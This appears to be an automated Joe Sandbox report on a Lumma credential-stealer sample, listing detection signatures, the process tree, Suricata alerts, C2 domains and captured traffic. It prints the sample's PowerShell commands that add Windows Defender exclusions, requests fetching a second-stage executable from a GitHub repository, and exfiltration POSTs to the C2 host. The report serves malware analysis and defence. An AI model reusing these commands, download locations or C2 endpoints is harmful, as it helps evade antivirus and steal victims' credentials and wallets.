Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
eXbhgU9.exe

Overview

General Information

Sample name:eXbhgU9.exe
Analysis ID:1582366
MD5:9be5ac720dcf1838fd5a2d7352672f66
SHA1:d8046191a1d1756768a8bad62ce3ba757deb7d53
SHA256:cc5eb5ac7cb599572a1c9747efa83774221e0ad4a24ed6545d5bc03a44a23196
Tags:exelummauser-juroots
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has nameless sections
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • eXbhgU9.exe (PID: 7340 cmdline: "C:\Users\user\Desktop\eXbhgU9.exe" MD5: 9BE5AC720DCF1838FD5A2D7352672F66)
    • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7456 cmdline: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\FkSpRTrp' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7660 cmdline: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • jyidkjkfhjawd.exe (PID: 7940 cmdline: "C:\FkSpRTrp\jyidkjkfhjawd.exe" MD5: 1B40450E11F71DA7D6F3D9C025C078E0)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["tirepublicerj.shop", "wholersorie.shop", "rabidcowse.shop", "noisycuttej.shop", "cloudewahsj.shop", "nearycrepso.shop", "abruptyopsn.shop", "framekgirus.shop", "abruptyopsn.shoph"], "Build id": "nbYRKl--"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000007.00000003.1860268247.0000000001436000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000007.00000003.1861189025.00000000013DE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000007.00000003.1874194613.0000000001434000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000007.00000003.1861666105.00000000013DE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000007.00000003.1874370927.00000000013DE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 5 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\FkSpRTrp', CommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\FkSpRTrp', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\eXbhgU9.exe", ParentImage: C:\Users\user\Desktop\eXbhgU9.exe, ParentProcessId: 7340, ParentProcessName: eXbhgU9.exe, ProcessCommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\FkSpRTrp', ProcessId: 7456, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\FkSpRTrp', CommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\FkSpRTrp', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\eXbhgU9.exe", ParentImage: C:\Users\user\Desktop\eXbhgU9.exe, ParentProcessId: 7340, ParentProcessName: eXbhgU9.exe, ProcessCommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\FkSpRTrp', ProcessId: 7456, ProcessName: powershell.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\FkSpRTrp', CommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\FkSpRTrp', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\eXbhgU9.exe", ParentImage: C:\Users\user\Desktop\eXbhgU9.exe, ParentProcessId: 7340, ParentProcessName: eXbhgU9.exe, ProcessCommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\FkSpRTrp', ProcessId: 7456, ProcessName: powershell.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-30T11:59:39.044317+010020283713Unknown Traffic192.168.2.449732104.21.18.19443TCP
                2024-12-30T11:59:39.955988+010020283713Unknown Traffic192.168.2.449733104.21.18.19443TCP
                2024-12-30T11:59:41.382705+010020283713Unknown Traffic192.168.2.449735104.21.18.19443TCP
                2024-12-30T11:59:42.507623+010020283713Unknown Traffic192.168.2.449739104.21.18.19443TCP
                2024-12-30T11:59:43.769545+010020283713Unknown Traffic192.168.2.449741104.21.18.19443TCP
                2024-12-30T11:59:45.317754+010020283713Unknown Traffic192.168.2.449743104.21.18.19443TCP
                2024-12-30T11:59:57.871611+010020283713Unknown Traffic192.168.2.449744104.21.18.19443TCP
                2024-12-30T11:59:59.961086+010020283713Unknown Traffic192.168.2.449745104.21.18.19443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-30T11:59:39.509278+010020546531A Network Trojan was detected192.168.2.449732104.21.18.19443TCP
                2024-12-30T11:59:40.414271+010020546531A Network Trojan was detected192.168.2.449733104.21.18.19443TCP
                2024-12-30T12:00:00.427219+010020546531A Network Trojan was detected192.168.2.449745104.21.18.19443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-30T11:59:39.509278+010020498361A Network Trojan was detected192.168.2.449732104.21.18.19443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-30T11:59:40.414271+010020498121A Network Trojan was detected192.168.2.449733104.21.18.19443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-30T11:59:56.966943+010020480941Malware Command and Control Activity Detected192.168.2.449743104.21.18.19443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-30T11:59:57.922786+010028438641A Network Trojan was detected192.168.2.449744104.21.18.19443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: https://framekgirus.shop:443/apitxtPKAvira URL Cloud: Label: malware
                Source: https://framekgirus.shop:443/apiDAvira URL Cloud: Label: malware
                Source: https://framekgirus.shop/apiAvira URL Cloud: Label: malware
                Source: https://framekgirus.shop/VgAvira URL Cloud: Label: malware
                Source: https://framekgirus.shop/api7Avira URL Cloud: Label: malware
                Source: https://framekgirus.shop/R5JAvira URL Cloud: Label: malware
                Source: https://framekgirus.shop/B5Avira URL Cloud: Label: malware
                Source: https://framekgirus.shop/j5BAvira URL Cloud: Label: malware
                Source: https://framekgirus.shop/api_Avira URL Cloud: Label: malware
                Source: https://framekgirus.shop/25Avira URL Cloud: Label: malware
                Source: https://framekgirus.shop/sAvira URL Cloud: Label: malware
                Source: https://framekgirus.shop/z5RAvira URL Cloud: Label: malware
                Source: https://framekgirus.shop:443/apiAvira URL Cloud: Label: malware
                Source: rabidcowse.shopAvira URL Cloud: Label: malware
                Source: https://framekgirus.shop/hAvira URL Cloud: Label: malware
                Source: wholersorie.shopAvira URL Cloud: Label: malware
                Source: https://framekgirus.shop/YAvira URL Cloud: Label: malware
                Source: cloudewahsj.shopAvira URL Cloud: Label: malware
                Source: nearycrepso.shopAvira URL Cloud: Label: malware
                Source: https://framekgirus.shop:443/apin.txtPKAvira URL Cloud: Label: malware
                Source: noisycuttej.shopAvira URL Cloud: Label: malware
                Source: https://framekgirus.shop/Avira URL Cloud: Label: malware
                Source: tirepublicerj.shopAvira URL Cloud: Label: malware
                Source: framekgirus.shopAvira URL Cloud: Label: malware
                Source: abruptyopsn.shopAvira URL Cloud: Label: malware
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeAvira: detection malicious, Label: HEUR/AGEN.1314134
                Source: jyidkjkfhjawd.exe.7940.7.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["tirepublicerj.shop", "wholersorie.shop", "rabidcowse.shop", "noisycuttej.shop", "cloudewahsj.shop", "nearycrepso.shop", "abruptyopsn.shop", "framekgirus.shop", "abruptyopsn.shoph"], "Build id": "nbYRKl--"}
                Source: eXbhgU9.exeReversingLabs: Detection: 13%
                Source: eXbhgU9.exeVirustotal: Detection: 22%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeJoe Sandbox ML: detected
                Source: eXbhgU9.exeJoe Sandbox ML: detected
                Source: 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmpString decryptor: cloudewahsj.shop
                Source: 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmpString decryptor: rabidcowse.shop
                Source: 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmpString decryptor: noisycuttej.shop
                Source: 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmpString decryptor: tirepublicerj.shop
                Source: 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmpString decryptor: framekgirus.shop
                Source: 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmpString decryptor: wholersorie.shop
                Source: 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmpString decryptor: abruptyopsn.shop
                Source: 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmpString decryptor: nearycrepso.shop
                Source: 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmpString decryptor: framekgirus.shop
                Source: 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmpString decryptor: - Screen Resoluton:
                Source: 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmpString decryptor: Workgroup: -
                Source: 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmpString decryptor: nbYRKl--
                Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.18.19:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.18.19:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.18.19:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.18.19:443 -> 192.168.2.4:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.18.19:443 -> 192.168.2.4:49741 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.18.19:443 -> 192.168.2.4:49743 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.18.19:443 -> 192.168.2.4:49744 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.18.19:443 -> 192.168.2.4:49745 version: TLS 1.2
                Source: eXbhgU9.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Users\Dan\source\repos\gamee\gamee\obj\Debug\gamee.pdb source: eXbhgU9.exe
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\AdobeJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\GoogleJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\PackagesJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\MozillaJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h0_2_00BE3078
                Source: C:\Users\user\Desktop\eXbhgU9.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_00BE2A81
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then cmp dword ptr [ebp+esi*8+00h], 56ADC53Ah7_2_00AF0480
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+217F4C11h]7_2_00AD6000
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then mov word ptr [eax], cx7_2_00AD3120
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx-143BF0FEh]7_2_00ABC22D
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then mov byte ptr [esi], dl7_2_00ABDE48
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then mov esi, edx7_2_00AB8640
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 9164D103h7_2_00AEFB80
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 385488F2h7_2_00AE98A0
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then movzx eax, byte ptr [ebp+ecx-000000DCh]7_2_00AD7CB0
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then mov word ptr [eax], cx7_2_00AD7CB0
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then mov edx, eax7_2_00AEC440
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then cmp byte ptr [esi+eax], 00000000h7_2_00ADA050
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]7_2_00AEF450
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then mov word ptr [eax], cx7_2_00ABB9F1
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+5024FCA5h]7_2_00AC4DC0
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then mov esi, ecx7_2_00AEC510
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then test eax, eax7_2_00AEC510
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 06702B10h7_2_00AEC510
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]7_2_00AD9A90
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then mov byte ptr [edi], bl7_2_00AB8EF0
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+000000C8h]7_2_00ABC6F0
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 2DFE5A91h7_2_00AEFE20
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+000011E4h]7_2_00AD3A60
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+20h]7_2_00AB73C0
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]7_2_00AB73C0
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]7_2_00AEF3C0
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]7_2_00AD37D0
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]7_2_00AB2B60
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-00000092h]7_2_00AD6360
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then mov word ptr [eax], cx7_2_00AD6360
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then push eax7_2_00ABBF40
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then mov word ptr [eax], cx7_2_00AD6340
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+217F4C99h]7_2_00AD6340

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49733 -> 104.21.18.19:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 104.21.18.19:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49743 -> 104.21.18.19:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49732 -> 104.21.18.19:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.18.19:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49745 -> 104.21.18.19:443
                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49744 -> 104.21.18.19:443
                Source: Malware configuration extractorURLs: tirepublicerj.shop
                Source: Malware configuration extractorURLs: wholersorie.shop
                Source: Malware configuration extractorURLs: rabidcowse.shop
                Source: Malware configuration extractorURLs: noisycuttej.shop
                Source: Malware configuration extractorURLs: cloudewahsj.shop
                Source: Malware configuration extractorURLs: nearycrepso.shop
                Source: Malware configuration extractorURLs: abruptyopsn.shop
                Source: Malware configuration extractorURLs: framekgirus.shop
                Source: Malware configuration extractorURLs: abruptyopsn.shoph
                Source: global trafficHTTP traffic detected: GET /arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.exe HTTP/1.1Host: github.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /arizaseeen/ariiiza/refs/heads/main/jyidkjkfhjawd.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 140.82.121.4 140.82.121.4
                Source: Joe Sandbox ViewIP Address: 185.199.110.133 185.199.110.133
                Source: Joe Sandbox ViewIP Address: 185.199.110.133 185.199.110.133
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.18.19:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.18.19:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.18.19:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.18.19:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.18.19:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.18.19:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.18.19:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 104.21.18.19:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: framekgirus.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: framekgirus.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JZVI9SMSXV6JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18122Host: framekgirus.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ONFA21ZDLTMDHK1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8761Host: framekgirus.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=441RW6H328User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20384Host: framekgirus.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=99SFX13IJKICJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1239Host: framekgirus.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XE2IAUBU8RSBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 584180Host: framekgirus.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: framekgirus.shop
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.exe HTTP/1.1Host: github.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /arizaseeen/ariiiza/refs/heads/main/jyidkjkfhjawd.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: github.com
                Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                Source: global trafficDNS traffic detected: DNS query: framekgirus.shop
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: framekgirus.shop
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1861493123.00000000042D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1861493123.00000000042D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: powershell.exe, 00000005.00000002.1742641026.00000000077E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mi
